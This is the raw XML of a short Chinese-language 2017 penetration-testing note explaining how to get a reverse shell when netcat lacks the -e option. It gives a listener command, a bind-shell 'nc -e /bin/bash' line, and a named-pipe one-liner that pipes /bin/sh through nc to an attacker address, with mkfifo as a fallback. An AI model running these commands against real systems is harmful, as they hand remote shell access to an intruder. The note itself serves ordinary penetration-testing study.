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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">无 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">-e </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>选项反弹</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0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585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在渗透测试过程中如果想反弹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们通常的做法是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style21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84C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs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84C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; nc -l -vv -p 2222 -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style21"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false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84C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style21"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false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84C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0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在</w:t>
      </w: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Linux</w:t>
      </w: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的大部分发行版中都默认编译了</w:t>
      </w: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nc</w:t>
      </w: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，但也许是出于安全考虑，发行版中默认编译的</w:t>
      </w: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nc</w:t>
      </w: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往往没有</w:t>
      </w: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-e</w:t>
      </w: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选项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0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在</w:t>
      </w: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Attack</w:t>
      </w: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这边依然用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0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nc -lnvp listenport</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0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585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>监听某端口，在目标环境中依次执行以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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555555"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>mkno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FF1493"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">d 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555555"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t> 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szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/tmp/backpipe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555555"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t> 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szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>p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/bin/sh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555555"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t> 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0&lt;/tmp/backpipe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555555"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t> 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| nc 192.168.xx.xx 4430 1&gt;/tmp/backpipe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="585858"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Style16"/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  <w:szCs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mknod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命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 有时需要权限，如不能创建临时管道，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使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>mkfifo /tmp/backpipe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也可以创建一个管道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enlo">
    <w:altName w:val="Monaco"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:altName w:val="Bitstream Vera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159</Words>
  <Characters>301</Characters>
  <CharactersWithSpaces>324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2017-08-21T09:30:51Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>zh-CN</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-08-21T09:39:13Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>